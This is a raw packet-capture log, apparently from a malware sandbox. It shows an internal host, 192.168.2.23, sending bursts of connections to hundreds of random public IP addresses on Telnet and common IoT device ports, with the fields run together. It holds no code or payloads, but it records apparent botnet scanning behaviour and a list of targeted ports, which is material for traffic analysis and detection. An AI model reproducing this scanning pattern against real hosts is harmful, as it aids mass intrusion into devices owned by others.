                                                                        Dec 6, 2024 00:37:06.530972958 CET8044138133.119.7.37192.168.2.23
                                                                        Dec 6, 2024 00:37:06.530985117 CET4915232884116.175.89.26192.168.2.23
                                                                        Dec 6, 2024 00:37:06.530997992 CET813615091.144.116.224192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531012058 CET8154248184.201.146.94192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531084061 CET528695589885.52.221.218192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531147003 CET4915255846116.48.214.197192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531162024 CET80804614250.129.165.8192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531171083 CET5286935422185.249.96.80192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531224966 CET8043258183.178.42.191192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531919956 CET8060098102.60.227.138192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531929016 CET814899281.55.21.230192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531944036 CET80803810450.210.105.42192.168.2.23
                                                                        Dec 6, 2024 00:37:06.531956911 CET8154110123.192.215.13192.168.2.23
                                                                        Dec 6, 2024 00:37:06.537847042 CET3721545652188.195.245.36192.168.2.23
                                                                        Dec 6, 2024 00:37:06.537873030 CET8056086204.30.144.174192.168.2.23
                                                                        Dec 6, 2024 00:37:06.537880898 CET80803436083.248.54.126192.168.2.23
                                                                        Dec 6, 2024 00:37:06.537908077 CET555543718215.101.251.205192.168.2.23
                                                                        Dec 6, 2024 00:37:06.537986994 CET8036370156.90.240.187192.168.2.23
                                                                        Dec 6, 2024 00:37:06.538001060 CET8040404139.210.155.192192.168.2.23
                                                                        Dec 6, 2024 00:37:06.539732933 CET528693744094.177.142.161192.168.2.23
                                                                        Dec 6, 2024 00:37:06.539741993 CET80804811833.72.49.85192.168.2.23
                                                                        Dec 6, 2024 00:37:06.539753914 CET8036152175.171.246.250192.168.2.23
                                                                        Dec 6, 2024 00:37:06.539761066 CET8052294197.68.216.109192.168.2.23
                                                                        Dec 6, 2024 00:37:06.539772034 CET80805165848.181.195.14192.168.2.23
                                                                        Dec 6, 2024 00:37:06.539788008 CET808037144157.232.42.141192.168.2.23
                                                                        Dec 6, 2024 00:37:06.539952040 CET805593484.119.107.118192.168.2.23
                                                                        Dec 6, 2024 00:37:06.539961100 CET5286960274101.203.94.126192.168.2.23
                                                                        Dec 6, 2024 00:37:06.540002108 CET808033500140.24.155.93192.168.2.23
                                                                        Dec 6, 2024 00:37:06.540018082 CET808059196190.162.9.88192.168.2.23
                                                                        Dec 6, 2024 00:37:06.540028095 CET8150956124.175.99.173192.168.2.23
                                                                        Dec 6, 2024 00:37:06.540090084 CET808048514109.3.50.60192.168.2.23
                                                                        Dec 6, 2024 00:37:06.540098906 CET808059994220.129.74.204192.168.2.23
                                                                        Dec 6, 2024 00:37:06.541014910 CET8055472121.142.208.105192.168.2.23
                                                                        Dec 6, 2024 00:37:06.541023970 CET80803648264.132.168.64192.168.2.23
                                                                        Dec 6, 2024 00:37:06.541033030 CET803467215.208.50.250192.168.2.23
                                                                        Dec 6, 2024 00:37:06.541040897 CET55554352069.249.109.177192.168.2.23
                                                                        Dec 6, 2024 00:37:06.541111946 CET8057546198.206.241.104192.168.2.23
                                                                        Dec 6, 2024 00:37:06.542839050 CET757445952107.108.113.107192.168.2.23
                                                                        Dec 6, 2024 00:37:06.542857885 CET8053212121.13.98.106192.168.2.23
                                                                        Dec 6, 2024 00:37:06.608839989 CET4691280192.168.2.23116.138.251.1
                                                                        Dec 6, 2024 00:37:06.608858109 CET531588080192.168.2.23197.112.191.213
                                                                        Dec 6, 2024 00:37:06.608866930 CET351408443192.168.2.23209.141.18.141
                                                                        Dec 6, 2024 00:37:06.608892918 CET4934480192.168.2.2378.126.194.179
                                                                        Dec 6, 2024 00:37:06.608906031 CET466868443192.168.2.2316.50.226.176
                                                                        Dec 6, 2024 00:37:06.608925104 CET607988080192.168.2.23112.153.207.115
                                                                        Dec 6, 2024 00:37:06.608927011 CET415528443192.168.2.23105.12.76.241
                                                                        Dec 6, 2024 00:37:06.608978033 CET4778449152192.168.2.23168.216.138.12
                                                                        Dec 6, 2024 00:37:06.608987093 CET405125555192.168.2.2318.179.120.132
                                                                        Dec 6, 2024 00:37:06.608992100 CET595988080192.168.2.23102.187.77.194
                                                                        Dec 6, 2024 00:37:06.609050989 CET6060249152192.168.2.23121.177.118.150
                                                                        Dec 6, 2024 00:37:06.609081030 CET6086249152192.168.2.2325.128.176.48
                                                                        Dec 6, 2024 00:37:06.609117031 CET5689649152192.168.2.23166.196.205.22
                                                                        Dec 6, 2024 00:37:06.609117031 CET5726080192.168.2.2362.39.202.69
                                                                        Dec 6, 2024 00:37:06.609128952 CET5587080192.168.2.2356.100.184.78
                                                                        Dec 6, 2024 00:37:06.609170914 CET5433852869192.168.2.23157.77.71.177
                                                                        Dec 6, 2024 00:37:06.609175920 CET478605555192.168.2.2386.240.223.174
                                                                        Dec 6, 2024 00:37:06.609194994 CET441667574192.168.2.2359.9.127.185
                                                                        Dec 6, 2024 00:37:06.609234095 CET5186452869192.168.2.2327.76.195.81
                                                                        Dec 6, 2024 00:37:06.609273911 CET402087574192.168.2.23158.99.48.169
                                                                        Dec 6, 2024 00:37:06.609276056 CET3450680192.168.2.2348.133.51.155
                                                                        Dec 6, 2024 00:37:06.609277964 CET4207080192.168.2.23156.82.219.223
                                                                        Dec 6, 2024 00:37:06.609301090 CET510467574192.168.2.23129.30.155.167
                                                                        Dec 6, 2024 00:37:06.609316111 CET4126881192.168.2.23179.41.218.103
                                                                        Dec 6, 2024 00:37:06.609333992 CET334868080192.168.2.2362.93.241.10
                                                                        Dec 6, 2024 00:37:06.609359026 CET557267574192.168.2.239.174.94.208
                                                                        Dec 6, 2024 00:37:06.609400034 CET3709880192.168.2.23138.112.67.100
                                                                        Dec 6, 2024 00:37:06.609411001 CET4633880192.168.2.235.66.245.147
                                                                        Dec 6, 2024 00:37:06.609411001 CET5917281192.168.2.2365.158.119.67
                                                                        Dec 6, 2024 00:37:06.609443903 CET3814280192.168.2.23209.75.120.198
                                                                        Dec 6, 2024 00:37:06.609448910 CET5511680192.168.2.2364.77.154.219
                                                                        Dec 6, 2024 00:37:06.609471083 CET3923280192.168.2.2399.207.247.232
                                                                        Dec 6, 2024 00:37:06.609492064 CET3654081192.168.2.2339.43.84.54
                                                                        Dec 6, 2024 00:37:06.609519958 CET3434049152192.168.2.2327.39.220.124
                                                                        Dec 6, 2024 00:37:06.609529018 CET5421280192.168.2.23188.84.47.83
                                                                        Dec 6, 2024 00:37:06.609565973 CET464108080192.168.2.23130.152.81.149
                                                                        Dec 6, 2024 00:37:06.609574080 CET373528443192.168.2.23157.133.189.147
                                                                        Dec 6, 2024 00:37:06.609584093 CET4567080192.168.2.2375.46.156.121
                                                                        Dec 6, 2024 00:37:06.609608889 CET553465555192.168.2.23221.232.130.20
                                                                        Dec 6, 2024 00:37:06.630130053 CET844339824169.191.103.1192.168.2.23
                                                                        Dec 6, 2024 00:37:06.632986069 CET5555496582.144.236.217192.168.2.23
                                                                        Dec 6, 2024 00:37:06.632996082 CET80804191859.14.26.31192.168.2.23
                                                                        Dec 6, 2024 00:37:06.633496046 CET75743445618.5.160.184192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639045000 CET808042762209.9.90.236192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639053106 CET8080420328.14.41.206192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639065981 CET757439076216.224.95.80192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639074087 CET8048178220.123.226.47192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639081001 CET528694146040.156.170.132192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639089108 CET808042800196.223.36.172192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639096975 CET808055486180.120.70.59192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639103889 CET84434248637.230.73.95192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639111996 CET808053162140.22.65.76192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639118910 CET803437478.132.73.224192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639127970 CET80804243494.215.141.54192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639136076 CET8051374193.34.214.53192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639142990 CET5286955920128.91.58.4192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639147043 CET8044886173.106.78.35192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639154911 CET815908087.173.40.163192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639163971 CET75745987226.69.100.31192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639168024 CET806040039.227.72.155192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639170885 CET55554578660.220.129.51192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639178038 CET3721544778154.235.218.105192.168.2.23
                                                                        Dec 6, 2024 00:37:06.639187098 CET8057842196.158.249.168192.168.2.23
                                                                        Dec 6, 2024 00:37:06.640373945 CET491523755620.164.209.99192.168.2.23
                                                                        Dec 6, 2024 00:37:06.640383005 CET8055668156.158.132.221192.168.2.23
                                                                        Dec 6, 2024 00:37:06.640389919 CET80537209.23.74.64192.168.2.23
                                                                        Dec 6, 2024 00:37:06.640403032 CET55553510216.102.200.139192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729437113 CET8046912116.138.251.1192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729460001 CET844335140209.141.18.141192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729470015 CET808053158197.112.191.213192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729491949 CET804934478.126.194.179192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729501009 CET84434668616.50.226.176192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729547024 CET808060798112.153.207.115192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729564905 CET844341552105.12.76.241192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729865074 CET4915247784168.216.138.12192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729875088 CET55554051218.179.120.132192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729887962 CET808059598102.187.77.194192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729976892 CET4915260602121.177.118.150192.168.2.23
                                                                        Dec 6, 2024 00:37:06.729993105 CET491526086225.128.176.48192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730128050 CET4915256896166.196.205.22192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730138063 CET805726062.39.202.69192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730151892 CET805587056.100.184.78192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730277061 CET5286954338157.77.71.177192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730307102 CET55554786086.240.223.174192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730315924 CET75744416659.9.127.185192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730417967 CET528695186427.76.195.81192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730465889 CET757440208158.99.48.169192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730484009 CET803450648.133.51.155192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730493069 CET8042070156.82.219.223192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730601072 CET757451046129.30.155.167192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730622053 CET8141268179.41.218.103192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730649948 CET80803348662.93.241.10192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730664015 CET7574557269.174.94.208192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730671883 CET8037098138.112.67.100192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730823040 CET80463385.66.245.147192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730871916 CET815917265.158.119.67192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730881929 CET8038142209.75.120.198192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730915070 CET805511664.77.154.219192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730935097 CET803923299.207.247.232192.168.2.23
                                                                        Dec 6, 2024 00:37:06.730958939 CET813654039.43.84.54192.168.2.23
                                                                        Dec 6, 2024 00:37:06.731031895 CET491523434027.39.220.124192.168.2.23
                                                                        Dec 6, 2024 00:37:06.733455896 CET8054212188.84.47.83192.168.2.23
                                                                        Dec 6, 2024 00:37:06.733474970 CET808046410130.152.81.149192.168.2.23
                                                                        Dec 6, 2024 00:37:06.733495951 CET844337352157.133.189.147192.168.2.23
                                                                        Dec 6, 2024 00:37:06.733510017 CET804567075.46.156.121192.168.2.23
                                                                        Dec 6, 2024 00:37:06.733514071 CET555555346221.232.130.20192.168.2.23
                                                                        Dec 6, 2024 00:37:06.853982925 CET419731023192.168.2.23200.46.215.144
                                                                        Dec 6, 2024 00:37:06.853987932 CET4197323192.168.2.23100.48.164.217
                                                                        Dec 6, 2024 00:37:06.854006052 CET4197323192.168.2.23182.155.138.180
                                                                        Dec 6, 2024 00:37:06.854012012 CET4197323192.168.2.23183.227.205.112
                                                                        Dec 6, 2024 00:37:06.854022026 CET4197323192.168.2.2387.197.91.201
                                                                        Dec 6, 2024 00:37:06.854022026 CET4197323192.168.2.2385.149.35.145
                                                                        Dec 6, 2024 00:37:06.854059935 CET4197323192.168.2.23107.171.6.89
                                                                        Dec 6, 2024 00:37:06.854072094 CET4197323192.168.2.2317.1.58.43
                                                                        Dec 6, 2024 00:37:06.854078054 CET4197323192.168.2.2373.136.28.170
                                                                        Dec 6, 2024 00:37:06.854079962 CET419732323192.168.2.2327.104.167.190
                                                                        Dec 6, 2024 00:37:06.854084969 CET4197323192.168.2.23175.201.72.186
                                                                        Dec 6, 2024 00:37:06.854093075 CET4197323192.168.2.239.179.163.105
                                                                        Dec 6, 2024 00:37:06.854093075 CET4197323192.168.2.2314.44.170.14
                                                                        Dec 6, 2024 00:37:06.854099035 CET4197323192.168.2.23175.62.163.223
                                                                        Dec 6, 2024 00:37:06.854099989 CET4197323192.168.2.23193.170.137.88
                                                                        Dec 6, 2024 00:37:06.854113102 CET4197323192.168.2.23123.252.125.208
                                                                        Dec 6, 2024 00:37:06.854116917 CET4197323192.168.2.2342.174.139.168
                                                                        Dec 6, 2024 00:37:06.854120970 CET4197323192.168.2.23183.120.216.29
                                                                        Dec 6, 2024 00:37:06.854127884 CET4197323192.168.2.23151.43.32.186
                                                                        Dec 6, 2024 00:37:06.854132891 CET419732323192.168.2.23165.101.122.72
                                                                        Dec 6, 2024 00:37:06.854135036 CET4197323192.168.2.23184.80.190.122
                                                                        Dec 6, 2024 00:37:06.854144096 CET4197323192.168.2.2317.99.0.31
                                                                        Dec 6, 2024 00:37:06.854144096 CET4197323192.168.2.23105.225.85.218
                                                                        Dec 6, 2024 00:37:06.854146004 CET4197323192.168.2.23203.179.0.33
                                                                        Dec 6, 2024 00:37:06.854157925 CET4197323192.168.2.2345.181.72.186
                                                                        Dec 6, 2024 00:37:06.854165077 CET4197323192.168.2.2382.1.68.189
                                                                        Dec 6, 2024 00:37:06.854172945 CET4197323192.168.2.23130.234.168.85
                                                                        Dec 6, 2024 00:37:06.854182959 CET4197323192.168.2.2387.117.58.169
                                                                        Dec 6, 2024 00:37:06.854187965 CET4197323192.168.2.2381.197.152.167
                                                                        Dec 6, 2024 00:37:06.854197025 CET419732323192.168.2.2390.184.128.52
                                                                        Dec 6, 2024 00:37:06.854197979 CET4197323192.168.2.23119.134.175.77
                                                                        Dec 6, 2024 00:37:06.854207039 CET4197323192.168.2.23216.99.25.226
                                                                        Dec 6, 2024 00:37:06.854207039 CET4197323192.168.2.23213.65.153.28
                                                                        Dec 6, 2024 00:37:06.854207039 CET4197323192.168.2.23185.63.215.190
                                                                        Dec 6, 2024 00:37:06.854227066 CET4197323192.168.2.23178.18.166.204
                                                                        Dec 6, 2024 00:37:06.854229927 CET4197323192.168.2.2391.14.189.241
                                                                        Dec 6, 2024 00:37:06.854231119 CET4197323192.168.2.23182.155.42.107
                                                                        Dec 6, 2024 00:37:06.854231119 CET4197323192.168.2.23112.62.81.231
                                                                        Dec 6, 2024 00:37:06.854237080 CET4197323192.168.2.23172.59.1.102
                                                                        Dec 6, 2024 00:37:06.854249954 CET4197323192.168.2.23162.53.243.217
                                                                        Dec 6, 2024 00:37:06.854249954 CET419732323192.168.2.2327.158.104.22
                                                                        Dec 6, 2024 00:37:06.854269981 CET4197323192.168.2.23118.71.99.75
                                                                        Dec 6, 2024 00:37:06.854271889 CET4197323192.168.2.23148.171.137.143
                                                                        Dec 6, 2024 00:37:06.854271889 CET4197323192.168.2.2369.214.105.251
                                                                        Dec 6, 2024 00:37:06.854271889 CET4197323192.168.2.23176.153.195.112
                                                                        Dec 6, 2024 00:37:06.854307890 CET4197323192.168.2.23154.129.0.108
                                                                        Dec 6, 2024 00:37:06.854307890 CET4197323192.168.2.2368.245.242.12
                                                                        Dec 6, 2024 00:37:06.854315042 CET4197323192.168.2.23157.194.33.89
                                                                        Dec 6, 2024 00:37:06.854319096 CET4197323192.168.2.2353.109.178.183
                                                                        Dec 6, 2024 00:37:06.854322910 CET419732323192.168.2.23188.197.221.93
                                                                        Dec 6, 2024 00:37:06.854329109 CET4197323192.168.2.2354.55.101.181
                                                                        Dec 6, 2024 00:37:06.854329109 CET4197323192.168.2.23102.147.131.242
                                                                        Dec 6, 2024 00:37:06.854329109 CET4197323192.168.2.23174.250.200.105
                                                                        Dec 6, 2024 00:37:06.854336977 CET4197323192.168.2.2338.65.199.95
                                                                        Dec 6, 2024 00:37:06.854343891 CET4197323192.168.2.23115.183.72.22
                                                                        Dec 6, 2024 00:37:06.854351044 CET4197323192.168.2.23197.119.147.40
                                                                        Dec 6, 2024 00:37:06.854361057 CET4197323192.168.2.23193.0.59.86
                                                                        Dec 6, 2024 00:37:06.854363918 CET4197323192.168.2.23109.157.190.195
                                                                        Dec 6, 2024 00:37:06.854373932 CET419732323192.168.2.23158.117.17.131
                                                                        Dec 6, 2024 00:37:06.854377031 CET4197323192.168.2.23186.251.87.209
                                                                        Dec 6, 2024 00:37:06.854391098 CET4197323192.168.2.23164.65.22.138
                                                                        Dec 6, 2024 00:37:06.854392052 CET4197323192.168.2.23124.79.232.69
                                                                        Dec 6, 2024 00:37:06.854403019 CET4197323192.168.2.23181.142.236.204
                                                                        Dec 6, 2024 00:37:06.854403019 CET4197323192.168.2.23131.2.193.14
                                                                        Dec 6, 2024 00:37:06.854408026 CET4197323192.168.2.239.6.39.72
                                                                        Dec 6, 2024 00:37:06.854412079 CET4197323192.168.2.23181.123.56.238
                                                                        Dec 6, 2024 00:37:06.854412079 CET419732323192.168.2.232.148.182.163
                                                                        Dec 6, 2024 00:37:06.854418039 CET4197323192.168.2.23206.247.249.147
                                                                        Dec 6, 2024 00:37:06.854428053 CET4197323192.168.2.2384.7.227.205
                                                                        Dec 6, 2024 00:37:06.854434013 CET4197323192.168.2.2371.119.251.159
                                                                        Dec 6, 2024 00:37:06.854434967 CET4197323192.168.2.23115.42.191.171
                                                                        Dec 6, 2024 00:37:06.854449987 CET4197323192.168.2.23221.165.248.208
                                                                        Dec 6, 2024 00:37:06.854449987 CET4197323192.168.2.23202.169.240.245
                                                                        Dec 6, 2024 00:37:06.854451895 CET4197323192.168.2.23126.81.233.82
                                                                        Dec 6, 2024 00:37:06.854456902 CET4197323192.168.2.23162.23.201.215
                                                                        Dec 6, 2024 00:37:06.854459047 CET4197323192.168.2.23178.94.3.109
                                                                        Dec 6, 2024 00:37:06.854470968 CET4197323192.168.2.23165.2.118.245
                                                                        Dec 6, 2024 00:37:06.854471922 CET4197323192.168.2.23135.162.227.11
                                                                        Dec 6, 2024 00:37:06.854475021 CET4197323192.168.2.2392.42.190.240
                                                                        Dec 6, 2024 00:37:06.854476929 CET419732323192.168.2.23125.26.139.21
                                                                        Dec 6, 2024 00:37:06.854479074 CET4197323192.168.2.2376.195.177.157
                                                                        Dec 6, 2024 00:37:06.854499102 CET4197323192.168.2.23188.98.100.109
                                                                        Dec 6, 2024 00:37:06.854500055 CET4197323192.168.2.23217.161.24.184
                                                                        Dec 6, 2024 00:37:06.854501963 CET4197323192.168.2.2374.151.62.218
                                                                        Dec 6, 2024 00:37:06.854505062 CET4197323192.168.2.2383.105.150.248
                                                                        Dec 6, 2024 00:37:06.854517937 CET4197323192.168.2.23169.187.1.14
                                                                        Dec 6, 2024 00:37:06.854517937 CET4197323192.168.2.2395.48.22.40
                                                                        Dec 6, 2024 00:37:06.854518890 CET4197323192.168.2.2344.13.196.4
                                                                        Dec 6, 2024 00:37:06.854520082 CET4197323192.168.2.2337.66.169.139
                                                                        Dec 6, 2024 00:37:06.854532957 CET4197323192.168.2.23218.138.145.211
                                                                        Dec 6, 2024 00:37:06.854537010 CET4197323192.168.2.2382.130.141.113
                                                                        Dec 6, 2024 00:37:06.854537010 CET4197323192.168.2.23108.78.195.27
                                                                        Dec 6, 2024 00:37:06.854540110 CET4197323192.168.2.239.151.24.138
                                                                        Dec 6, 2024 00:37:06.854552984 CET419732323192.168.2.23213.19.46.120
                                                                        Dec 6, 2024 00:37:06.854552984 CET4197323192.168.2.23111.70.5.249
                                                                        Dec 6, 2024 00:37:06.854559898 CET4197323192.168.2.234.122.102.45
                                                                        Dec 6, 2024 00:37:06.854563951 CET4197323192.168.2.2393.120.249.214
                                                                        Dec 6, 2024 00:37:06.854581118 CET4197323192.168.2.2358.46.126.126
                                                                        Dec 6, 2024 00:37:06.854582071 CET4197323192.168.2.23188.110.246.195
                                                                        Dec 6, 2024 00:37:06.854583025 CET419732323192.168.2.23223.157.57.81
                                                                        Dec 6, 2024 00:37:06.854585886 CET4197323192.168.2.23221.211.138.53
                                                                        Dec 6, 2024 00:37:06.854598045 CET4197323192.168.2.23201.144.130.177
                                                                        Dec 6, 2024 00:37:06.854598999 CET4197323192.168.2.2335.236.170.3
                                                                        Dec 6, 2024 00:37:06.854604959 CET4197323192.168.2.23152.162.65.50
                                                                        Dec 6, 2024 00:37:06.854614973 CET4197323192.168.2.23126.55.185.255
                                                                        Dec 6, 2024 00:37:06.854617119 CET4197323192.168.2.23167.198.174.5
                                                                        Dec 6, 2024 00:37:06.854621887 CET4197323192.168.2.2357.71.40.167
                                                                        Dec 6, 2024 00:37:06.854621887 CET4197323192.168.2.238.131.69.188
                                                                        Dec 6, 2024 00:37:06.854648113 CET419732323192.168.2.23198.73.141.236
                                                                        Dec 6, 2024 00:37:06.854665041 CET4197323192.168.2.23155.247.64.174
                                                                        Dec 6, 2024 00:37:06.854667902 CET4197323192.168.2.23142.13.52.249
                                                                        Dec 6, 2024 00:37:06.854675055 CET4197323192.168.2.2389.125.253.249
                                                                        Dec 6, 2024 00:37:06.854677916 CET4197323192.168.2.23149.73.23.174
                                                                        Dec 6, 2024 00:37:06.854677916 CET4197323192.168.2.2386.2.136.169
                                                                        Dec 6, 2024 00:37:06.854680061 CET4197323192.168.2.235.51.223.90
                                                                        Dec 6, 2024 00:37:06.854688883 CET4197323192.168.2.23191.22.84.64
                                                                        Dec 6, 2024 00:37:06.854716063 CET4197323192.168.2.2368.90.226.183
                                                                        Dec 6, 2024 00:37:06.854716063 CET4197323192.168.2.23164.31.168.157
                                                                        Dec 6, 2024 00:37:06.854716063 CET419732323192.168.2.23195.133.8.123
                                                                        Dec 6, 2024 00:37:06.854716063 CET4197323192.168.2.23211.55.45.127
                                                                        Dec 6, 2024 00:37:06.854726076 CET4197323192.168.2.2331.181.208.186
                                                                        Dec 6, 2024 00:37:06.854726076 CET4197323192.168.2.23157.81.178.130
                                                                        Dec 6, 2024 00:37:06.854726076 CET419731023192.168.2.2340.189.195.112
                                                                        Dec 6, 2024 00:37:06.854734898 CET4197323192.168.2.23151.219.219.187
                                                                        Dec 6, 2024 00:37:06.854738951 CET4197323192.168.2.23111.210.22.132
                                                                        Dec 6, 2024 00:37:06.854753971 CET4197323192.168.2.2375.11.64.140
                                                                        Dec 6, 2024 00:37:06.854754925 CET4197323192.168.2.23100.245.152.232
                                                                        Dec 6, 2024 00:37:06.854754925 CET4197323192.168.2.23111.56.216.7
                                                                        Dec 6, 2024 00:37:06.854758024 CET419732323192.168.2.232.141.22.127
                                                                        Dec 6, 2024 00:37:06.854760885 CET4197323192.168.2.2395.115.38.229
                                                                        Dec 6, 2024 00:37:06.854768991 CET4197323192.168.2.23155.4.99.76
                                                                        Dec 6, 2024 00:37:06.854768991 CET4197323192.168.2.23221.139.235.125
                                                                        Dec 6, 2024 00:37:06.854775906 CET4197323192.168.2.23104.120.161.25
                                                                        Dec 6, 2024 00:37:06.854788065 CET4197323192.168.2.23217.33.139.135
                                                                        Dec 6, 2024 00:37:06.854788065 CET4197323192.168.2.23115.198.101.68
                                                                        Dec 6, 2024 00:37:06.854811907 CET4197323192.168.2.2320.212.33.159
                                                                        Dec 6, 2024 00:37:06.854811907 CET4197323192.168.2.2379.34.192.78
                                                                        Dec 6, 2024 00:37:06.854811907 CET4197323192.168.2.2346.251.48.187
                                                                        Dec 6, 2024 00:37:06.854811907 CET419732323192.168.2.23186.233.121.16
                                                                        Dec 6, 2024 00:37:06.854815960 CET4197323192.168.2.23180.28.7.21
                                                                        Dec 6, 2024 00:37:06.854825020 CET4197323192.168.2.23201.253.116.137
                                                                        Dec 6, 2024 00:37:06.854825974 CET4197323192.168.2.23167.202.18.125
                                                                        Dec 6, 2024 00:37:06.854834080 CET4197323192.168.2.23173.22.179.9
                                                                        Dec 6, 2024 00:37:06.854841948 CET4197323192.168.2.2320.204.11.170
                                                                        Dec 6, 2024 00:37:06.854850054 CET4197323192.168.2.2388.160.138.153
                                                                        Dec 6, 2024 00:37:06.854855061 CET4197323192.168.2.23162.214.130.200
                                                                        Dec 6, 2024 00:37:06.854867935 CET4197323192.168.2.23194.196.75.228
                                                                        Dec 6, 2024 00:37:06.854868889 CET4197323192.168.2.23212.100.181.84
                                                                        Dec 6, 2024 00:37:06.854875088 CET4197323192.168.2.23182.141.18.29
                                                                        Dec 6, 2024 00:37:06.854875088 CET4197323192.168.2.2382.171.152.99
                                                                        Dec 6, 2024 00:37:06.854875088 CET419732323192.168.2.23100.166.44.48
                                                                        Dec 6, 2024 00:37:06.854880095 CET4197323192.168.2.23168.223.39.100
                                                                        Dec 6, 2024 00:37:06.854893923 CET4197323192.168.2.23163.65.214.214
                                                                        Dec 6, 2024 00:37:06.854893923 CET4197323192.168.2.23179.50.151.243
                                                                        Dec 6, 2024 00:37:06.854893923 CET4197323192.168.2.23197.238.44.19
                                                                        Dec 6, 2024 00:37:06.854896069 CET4197323192.168.2.23125.140.165.46
                                                                        Dec 6, 2024 00:37:06.854908943 CET4197323192.168.2.2353.39.149.101
                                                                        Dec 6, 2024 00:37:06.854914904 CET4197323192.168.2.2372.82.150.182
                                                                        Dec 6, 2024 00:37:06.932833910 CET4142081192.168.2.2333.20.233.190
                                                                        Dec 6, 2024 00:37:06.933223963 CET5111437215192.168.2.23118.197.10.107
                                                                        Dec 6, 2024 00:37:06.933562040 CET431348080192.168.2.23142.67.238.233
                                                                        Dec 6, 2024 00:37:06.933937073 CET3291680192.168.2.2315.252.209.178
                                                                        Dec 6, 2024 00:37:06.934302092 CET364948443192.168.2.23118.85.253.235
                                                                        Dec 6, 2024 00:37:06.934638977 CET4071849152192.168.2.23178.72.204.4
                                                                        Dec 6, 2024 00:37:06.935055971 CET4783637215192.168.2.235.174.228.198
                                                                        Dec 6, 2024 00:37:06.935384989 CET5807849152192.168.2.2396.81.159.236
                                                                        Dec 6, 2024 00:37:06.935741901 CET600228080192.168.2.2354.254.1.112
                                                                        Dec 6, 2024 00:37:06.936115980 CET5022880192.168.2.2381.210.236.238
                                                                        Dec 6, 2024 00:37:06.936499119 CET5022237215192.168.2.23171.88.32.116
                                                                        Dec 6, 2024 00:37:06.936851978 CET3740849152192.168.2.2358.25.214.119
                                                                        Dec 6, 2024 00:37:06.937220097 CET5388280192.168.2.2361.221.193.115
                                                                        Dec 6, 2024 00:37:06.937596083 CET417268080192.168.2.23212.232.123.121
                                                                        Dec 6, 2024 00:37:06.937963009 CET4130237215192.168.2.23137.202.127.253
                                                                        Dec 6, 2024 00:37:06.938345909 CET4904452869192.168.2.23173.224.150.117
                                                                        Dec 6, 2024 00:37:06.938698053 CET5804680192.168.2.2376.231.140.115
                                                                        Dec 6, 2024 00:37:06.939059019 CET5026280192.168.2.23202.51.201.37
                                                                        Dec 6, 2024 00:37:06.939435005 CET332028080192.168.2.23153.157.254.30
                                                                        Dec 6, 2024 00:37:06.939798117 CET590205555192.168.2.2325.40.34.74
                                                                        Dec 6, 2024 00:37:06.940164089 CET457587574192.168.2.2319.251.187.157
                                                                        Dec 6, 2024 00:37:06.940531015 CET449227574192.168.2.2375.14.247.30
                                                                        Dec 6, 2024 00:37:06.940541029 CET6012281192.168.2.231.228.137.84
                                                                        Dec 6, 2024 00:37:06.940901995 CET3446852869192.168.2.2341.43.78.104
                                                                        Dec 6, 2024 00:37:06.941279888 CET4810237215192.168.2.23144.147.141.226
                                                                        Dec 6, 2024 00:37:06.941648006 CET443388080192.168.2.23189.229.175.122
                                                                        Dec 6, 2024 00:37:06.942011118 CET5569280192.168.2.23182.149.46.3
                                                                        Dec 6, 2024 00:37:06.942375898 CET340868080192.168.2.23215.189.147.100
                                                                        Dec 6, 2024 00:37:06.942764997 CET592547574192.168.2.23130.123.72.225
                                                                        Dec 6, 2024 00:37:06.943116903 CET493548080192.168.2.2371.164.37.212
